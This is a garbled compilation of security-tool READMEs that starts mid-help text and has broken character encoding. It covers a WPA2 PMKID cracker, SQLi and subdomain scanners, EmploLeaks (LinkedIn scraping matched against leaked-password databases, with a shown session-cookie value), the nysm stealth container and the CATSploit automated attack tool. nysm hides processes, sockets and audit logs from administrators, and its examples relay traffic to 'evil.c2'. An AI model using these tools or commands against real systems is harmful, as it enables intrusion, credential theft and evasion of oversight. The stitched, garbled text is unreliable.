How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
RETR
retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk
and calculate_pmkid
.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1
in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Zero-dollar attack surface management tool
featured at Black Hat Arsenal 2023 and Recon Village @ DEF CON 2023.
Easy EASM is just that... the easiest to set-up tool to give your organization visibility into its external facing assets.
The industry is dominated by $30k vendors selling "Attack Surface Management," but OG bug bounty hunters and red teamers know the truth. External ASM was born out of the bug bounty scene. Most of these $30k vendors use this open-source tooling on the backend.
With ten lines of setup or less, using open-source tools, and one button deployment, Easy EASM will give your organization a complete view of your online assets. Easy EASM scans you daily and alerts you via Slack or Discord on newly found assets! Easy EASM also spits out an Excel skeleton for a Risk Register or Asset Database! This isn't rocket science, but it's USEFUL. Don't get scammed. Grab Easy EASM and feel confident you know what's facing attackers on the internet.
go install github.com/g0ldencybersec/EasyEASM/easyeasm@latest
The tool expects a configuration file named config.yml
to be in the directory you are running from.
Here is example of this yaml file:
# EasyEASM configurations
runConfig:
domains: # List root domains here.
- example.com
- mydomain.com
slack: https://hooks.slack.com/services/DUMMYDATA/DUMMYDATA/RANDOM # Slack webhook url for Slack notifications.
discord: https://discord.com/api/webhooks/DUMMYURL/Dasdfsdf # Discord webhook for Discord notifications.
runType: fast # Set to either fast (passive enum) or complete (active enumeration).
activeWordList: subdomainWordlist.txt
activeThreads: 100
To run the tool, fill out the config file: config.yml
. Then, run the easyeasm
module:
./easyeasm
After the run is complete, you should see the output CSV (EasyEASM.csv
) in the run directory. This CSV can be added to your asset database and risk register!
The creator(s) of this tool provides no warranty or assurance regarding its performance, dependability, or suitability for any specific purpose.
The tool is furnished on an "as is" basis without any form of warranty, whether express or implied, encompassing, but not limited to, implied warranties of merchantability, fitness for a particular purpose, or non-infringement.
The user assumes full responsibility for employing this tool and does so at their own peril. The creator(s) holds no accountability for any loss, damage, or expenses sustained by the user or any third party due to the utilization of this tool, whether in a direct or indirect manner.
Moreover, the creator(s) explicitly renounces any liability or responsibility for the accuracy, substance, or availability of information acquired through the use of this tool, as well as for any harm inflicted by viruses, malware, or other malicious components that may infiltrate the user's system as a result of employing this tool.
By utilizing this tool, the user acknowledges that they have perused and understood this warranty declaration and agree to undertake all risks linked to its utilization.
This project is licensed under the MIT License - see the LICENSE.md for details.
For assistance, use the Issues tab. If we do not respond within 7 days, please reach out to us here.
A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Features
so the script is super fast at scanning many urls
quick tutorial & screenshots are shown at the bottom
project contribution tips at the bottom
Β
Installation
git clone https://github.com/Mr-Robert0/Logsensor.git
cd Logsensor && sudo chmod +x logsensor.py install.sh
pip install -r requirements.txt
./install.sh
Dependencies
Β
1. Multiple hosts scanning to detect login panels
python3 logsensor.py -f <subdomains-list>
python3 logsensor.py -f <subdomains-list> -t 50
python3 logsensor.py -f <subdomains-list> --login
2. Targeted SQLi form scanning
python logsensor.py -u www.example.com/login --sqli
python logsensor.py -u www.example.com/login -s --proxy http://127.0.0.1:8080
python logsensor.py -u www.example.com/login -s --inputname email
View help
python logsensor.py --help
usage: logsensor.py [-h --help] [--file ] [--url ] [--proxy] [--login] [--sqli] [--threads]
optional arguments:
-u , --url Target URL (e.g. http://example.com/ )
-f , --file Select a target hosts list file (e.g. list.txt )
--proxy Proxy (e.g. http://127.0.0.1:8080)
-l, --login run only Login panel Detector Module
-s, --sqli run only POST Form SQLi Scanning Module with provided Login panels Urls
-n , --inputname Customize actual username input for SQLi scan (e.g. 'username' or 'email')
-t , --threads Number of threads (default 30)
-h, --help Show this help message and exit
TODO
Β
This is a tool designed for Open Source Intelligence (OSINT) purposes, which helps to gather information about employees of a company.
The tool starts by searching through LinkedIn to obtain a list of employees of the company. Then, it looks for their social network profiles to find their personal email addresses. Finally, it uses those email addresses to search through a custom COMB database to retrieve leaked passwords. You an easily add yours and connect to through the tool.
To use this tool, you'll need to have Python 3.10 installed on your machine. Clone this repository to your local machine and install the required dependencies using pip in the cli folder:
cd cli
pip install -r requirements.txt
We know that there is a problem when installing the tool due to the psycopg2 binary. If you run into this problem, you can solve it running:
cd cli
python3 -m pip install psycopg2-binary`
To use the tool, simply run the following command:
python3 cli/emploleaks.py
If everything went well during the installation, you will be able to start using EmploLeaks:
___________ .__ .__ __
\_ _____/ _____ ______ | | ____ | | ____ _____ | | __ ______
| __)_ / \____ \| | / _ \| | _/ __ \__ \ | |/ / / ___/
| \ Y Y \ |_> > |_( <_> ) |_\ ___/ / __ \| < \___ \
/_______ /__|_| / __/|____/\____/|____/\___ >____ /__|_ \/____ >
\/ \/|__| \/ \/ \/ \/
OSINT tool Γ°ΕΈβ’Β΅ to chain multiple apis
emploleaks>
Right now, the tool supports two functionalities:
First, you must set the plugin to use, which in this case is linkedin. After, you should set your authentication tokens and the run the impersonate process:
emploleaks> use --plugin linkedin
emploleaks(linkedin)> setopt JSESSIONID
JSESSIONID:
[+] Updating value successfull
emploleaks(linkedin)> setopt li-at
li-at:
[+] Updating value successfull
emploleaks(linkedin)> show options
Module options:
Name Current Setting Required Description
---------- ----------------------------------- ---------- -----------------------------------
hide yes no hide the JSESSIONID field
JSESSIONID ************************** no active cookie session in browser #1
li-at AQEDAQ74B0YEUS-_AAABilIFFBsAAAGKdhG no active cookie session in browser #1
YG00AxGP34jz1bRrgAcxkXm9RPNeYIAXz3M
cycrQm5FB6lJ-Tezn8GGAsnl_GRpEANRdPI
lWTRJJGF9vbv5yZHKOeze_WCHoOpe4ylvET
kyCyfN58SNNH
emploleaks(linkedin)> run i mpersonate
[+] Using cookies from the browser
Setting for first time JSESSIONID
Setting for first time li_at
li_at and JSESSIONID are the authentication cookies of your LinkedIn session on the browser. You can use the Web Developer Tools to get it, just sign-in normally at LinkedIn and press right click and Inspect, those cookies will be in the Storage tab.
Now that the module is configured, you can run it and start gathering information from the company:
We created a custom workflow, where with the information retrieved by Linkedin, we try to match employees' personal emails to potential leaked passwords. In this case, you can connect to a database (in our case we have a custom indexed COMB database) using the connect command, as it is shown below:
emploleaks(linkedin)> connect --user myuser --passwd mypass123 --dbname mydbname --host 1.2.3.4
[+] Connecting to the Leak Database...
[*] version: PostgreSQL 12.15
Once it's connected, you can run the workflow. With all the users gathered, the tool will try to search in the database if a leaked credential is affecting someone:
An imortant aspect of this project is the use of the indexed COMB database, to build your version you need to download the torrent first. Be careful, because the files and the indexed version downloaded requires, at least, 400 GB of disk space available.
Once the torrent has been completelly downloaded you will get a file folder as following:
Γ’βΕΓ’ββ¬Γ’ββ¬ count_total.sh
Γ’βΕΓ’ββ¬Γ’ββ¬ data
Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 0
Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 1
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 0
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 1
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 2
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 3
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 4
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’&β¬ 5
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 6
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 7
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 8
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ 9
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ a
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ b
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ c
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ d
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ e
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ f
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ g
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ h
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ i
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ j
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ k
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ l
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ m
Γ’ββ Γ’ββ Γ’βΕΓ’ β¬Γ’ββ¬ n
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ o
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ p
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ q
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ r
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ s
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ symbols
Γ’ββ Γ’ββ Γ’βΕΓ’ββ¬Γ’ββ¬ t
At this point, you could import all those files with the command create_db
:
We are integrating other public sites and applications that may offer about a leaked credential. We may not be able to see the plaintext password, but it will give an insight if the user has any compromised credential:
Also, we will be focusing on gathering even more information from public sources of every employee. Do you have any idea in mind? Don't hesitate to reach us:
Or you con DM at @pastacls or @gaaabifranco on Twitter.
Bugsy is a command-line interface (CLI) tool that provides automatic security vulnerability remediation for your code. It is the community edition version of Mobb, the first vendor-agnostic automated security vulnerability remediation tool. Bugsy is designed to help developers quickly identify and fix security vulnerabilities in their code.
Mobb is the first vendor-agnostic automatic security vulnerability remediation tool. It ingests SAST results from Checkmarx, CodeQL (GitHub Advanced Security), OpenText Fortify, and Snyk and produces code fixes for developers to review and commit to their code.
Bugsy has two modes - Scan (no SAST report needed) & Analyze (the user needs to provide a pre-generated SAST report from one of the supported SAST tools).
Scan
Analyze
This is a community edition version that only analyzes public GitHub repositories. Analyzing private repositories is allowed for a limited amount of time. Bugsy does not detect any vulnerabilities in your code, it uses findings detected by the SAST tools mentioned above.
You can simply run Bugsy from the command line, using npx:
WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.
The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.
g!2m0:~ webcopilot -h
βββββββββββββββββ
ββββββββββββββββββ
ββββββββββββββββββββββ
ββββββββββββ¬βββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββββββββββ
[β] @h4r5h1t.hrs | G!2m0
Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]
Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message
Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server
WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot
git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh
SubFinder β’ Sublist3r β’ Findomain β’ gf β’ OpenRedireX β’ dnsx β’ sqlmap β’ gobuster β’ assetfinder β’ httpx β’ kxss β’ qsreplace β’ Nuclei β’ dalfox β’ anew β’ jq β’ aquatone β’ urldedupe β’ Amass β’ gauplus β’ waybackurls β’ crlfuzz
To run the tool on a target, just use the following command.
g!2m0:~ webcopilot -d bugcrowd.com
The -o
command can be used to specify an output dir.
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
The -s
command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s
The -t
command can be used to add thrads to your scan for faster result.
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333
The -b
command can be used for blind xss (OOB), you can get your server from xsshunter or interact
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss
The -x
command can be used to exclude out of scope domains.
g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss
Default options looks like this:
g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
βββββββββββββββββ
ββββββββββββββββββ
ββββββββββββββββββββββ
ββββββββββββ¬βββββββββββ
βββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββ βββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ ββββββ
βββββββββββββββββββββββββββββ¦βββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββ βββββββββββββββββββββββββββββ
[β] @h4r5h1t.hrs | G!2m0
[β] Warning: Use with caution. You are responsible for your own actions.
[β] Developers assume no liability and are not responsible for any misuse or damage cause by this tool.
Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00
[!] Please wait while scanning...
[β] Subdoamin Scanning is in progress: Scanning subdomains of bugcrowd.com
[β] Subdoamin Scanned - [assetfinderβ] Subdomain Found: 34
[β] Subdoamin Scanned - [sublist3rβ] Subdomain Found: 29
[β] Subdoamin Scanned - [subfinderβ] Subdomain Found: 54
[β] Subdoamin Scanned - [amassβ] Subdomain Found: 43
[β] Subdoamin Scanned - [findomainβ] Subdomain Found: 27
[β] Active Subdoamin Scanning is in progress:
[!] Please be patient. This may take a while...
[β] Active Subdoamin Scanned - [gobusterβ] Subdomain Found: 11
[β] Active Subdoamin Scanned - [amassβ] Subdomain Found: 0
[β] Subdomain Scanning: Filtering out of scope subdomains
[β] Subdomain Scanning: Filtering Alive subdomains
[β] Subdomain Scanning: Getting titles of valid subdomains
[β] Visual inspection of Subdoamins is completed. Check: /subdomains/aquatone/
[β] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30
[β] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[β] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[β] Vulnerabilities Scanned - [XSSβ] Found: 0
[β] Vulnerabilities Scanned - [SQLiβ] Found: 0
[β] Vulnerabilities Scanned - [LFIβ] Found: 0
[β] Vulnerabilities Scanned - [CRLFβ] Found: 0
[β] Vulnerabilities Scanned - [SSRFβ] Found: 0
[β] Vulnerabilities Scanned - [Sensitive Dataβ] Found: 0
[β] Vulnerabilities Scanned - [Open redirectβ] Found: 0
[β] Vulnerabilities Scanned - [Subdomain Takeoverβ] Found: 0
[β] Vulnerabilities Scanned - [Nuclieβ] Found: 0
[β] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/
βββββ βββ βββ ββββ βββ βββββ
βββββ βββ βββ ββββ βββ βββββ
βββββ βββ βββ ββββ βββ βββββ
[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0
WebCopilot is inspired from Garud & Pinaak by ROX4R.
@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R
Warning: Developers assume no liability and are not responsible for any misuse or damage cause by this tool. So, please se with caution because you are responsible for your own actions. |
A stealth post-exploitation container.
With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:
All these tools go blind to what goes through nysm. It hides:
Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.
Β
sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y
cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h
cd ./nysm/src/
make
nysm is a simple program to run before the intended command:
Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.
-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message
Run a hidden bash
:
./nysm bash
Run a hidden ssh
and remove ./nysm
:
./nysm -r ssh user@domain
Run a hidden socat
as a daemon and remove ./nysm
:
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443
As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.
To differentiate nysm events from the others, everything runs inside a seperated PID namespace.
bpftool
has some features nysm wants to evade: bpftool prog list
, bpftool map list
and bpftool link list
.
As any eBPF program, bpftool
uses the bpf()
system call, and more specifically with the BPF_PROG_GET_NEXT_ID
, BPF_MAP_GET_NEXT_ID
and BPF_LINK_GET_NEXT_ID
commands. The result of these calls is stored in the userspace address pointed by the attr
argument.
To overwrite uattr
, a tracepoint is set on the bpf()
entry to store the pointed address in a map. Once done, it waits for the bpf()
exit tracepoint. When bpf()
exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID
, bpf_attr.start_id
is replaced by bpf_attr.next_id
.
In order to hide specific IDs, it checks bpf_attr.next_id
and replaces it with the next ID that was not created in nysm.
Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().
Auditd receives its logs from recvfrom()
which stores its messages in a buffer.
If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr
header by 0.
Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid()
PIDs from getdents64()
in /proc
by changing the length of the previous record.
As getdents64()
requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.
Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc
. Nevertheless, ss
uses socket()
with the NETLINK_SOCK_DIAG
flag which returns all the currently opened sockets. After that, ss
receives the result through recvmsg()
in a message buffer and the returned value is the length of all these messages combined.
Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.
These are collected from the connect()
and bind()
calls.
Even with the best effort, nysm still has some limitations.
Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash
is running before top
, the processes will not show up. But, if another process is created from that bash
instance while top
is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.
Kernel logs: dmesg
and /var/log/kern.log
, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory!
will pop several times because of the eBPF verifier on nysm run.
Many traces written into files are left as hooking read()
and write()
would be too heavy (but still possible). For example /proc/net/tcp
or /sys/kernel/debug/tracing/enabled_functions
.
Hiding ss
recvmsg
can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.
Running bpf()
with any kind of BPF_*_GET_NEXT_ID
flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.
Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.
CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentesterβs skill) .
CATSploit automatically performs penetration tests in the following sequence:
Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.
Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.
Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.
Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.
CATSploit has the following prerequisites:
For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.
To install the latest version of CATSploit, please use the following commands:
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh
CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json
, the following fields should be modified for your environment.
(*) Adjust the number according to the specs of your machine.
To start the server, execute the following command:
$ python cats_server.py -c [CONFIG_FILE]
Next, prepare another console, start the client program, and initiate a connection to the server.
$ python catsploit.py -s [SOCKET_PATH]
After successfully connecting to the server and initializing it, the session will start.
_________ ___________ __ _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/
[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>
The client can execute a variety of commands. Each command can be executed with -h
option to display the format of its arguments.
usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...
positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}
options:
-h, --help show this help message and exit
I've posted the commands and options below as well for reference.
host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit
host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit
scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit
scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit
scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned
plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit
attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute
options:
-h, --help show this help message and exit
post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit
reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit
exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit
In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.
catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
ββββββββββββ³βββββββββββββββββ³βββββββββββ³βββββββββββββββββββββββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββ βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β attacker β 0.0.0.0 β kali β kali 2022.4 β True β
β h_exbiy6 β 192.168.0.10 β β Linux 3.10 - 4.11 β False β
β h_nhqyfq β 192.168.0.20 β β Microsoft Windows 7 SP1 β False β
ββββββββββββ΄ ββββββββββββββββ΄βββββββββββ΄βββββββββββββββββββββββββββββββββββ΄ββββββββ
catsploit> host detail h_exbiy6
ββββββββββββ³βββββββββββββββ³βββββββββββ³βββββββββββββββ³ββββββββ
β hostID β IP β Hostname β Platform β Pwned β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β h_exbiy6 β 192.168.0.10 β ubuntu β ubuntu 14.04 β False β
ββββββββββββ΄βββββββββββββββ΄βββββββββββ΄βββββββββββββββ΄β ββββββ
[IP address]
ββββββββββββββββ³βββββββββββ³βββββββ³βββββββββββββ
β ipv4 β ipv4mask β ipv6 β ipv6prefix β
β‘ββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β β β β
βββββββββββββ ββ΄βββββββββββ΄βββββββ΄βββββββββββββ
[Open ports]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββ³βββββββββββββββ³βββββββββββββββββββββββββββββ
β ip β proto β port β service β product β version β
β‘ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 21 β ftp β ProFTPD β 1.3.5 β
β 192.168.0.10 β tcp β 22 β ssh β OpenSSH β 6.6.1p1 Ubuntu 2ubuntu2.10 β
β 192.168.0.10 β tcp β 80 β http β Apache httpd β 2.4.7 β
β 192.168.0.10 β tcp β 445 β netbios-ssn β Samba smbd β 3.X - 4.X β
β 192.168.0.10 β tcp β 631 β ipp β CUPS β 1.7 β
ββββββββββββββββ΄ββββββββ΄βββββββ΄ββββββββββββββ΄βββββββββββββββ΄βββββββββββββββββββββββββββββ
[Vulnerabilities]
ββββββββββββββββ³ββββββββ³βββββββ³ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ³βββββββββββββββββ
β ip β proto β port β vuln_name β cve β
β‘βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ©
β 192.168.0.10 β tcp β 0 β TCP Timestamps Information Disclosure β N/A β
β 192.168.0.10 β tcp β 21 β FTP Unencrypted Cleartext Login β N/A β
β 192.168.0.10 β tcp β 22 β Weak MAC Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Encryption Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Host Key Algorithm(s) (SSH) β N/A β
β 192.168.0.10 β tcp β 22 β Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) β N/A β
β 192.168.0.10 β tcp β 80 β Test HTTP dangerous methods β N/A β
β 192.168.0.10 β tcp β 80 β Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check β CVE-2014-3704 β
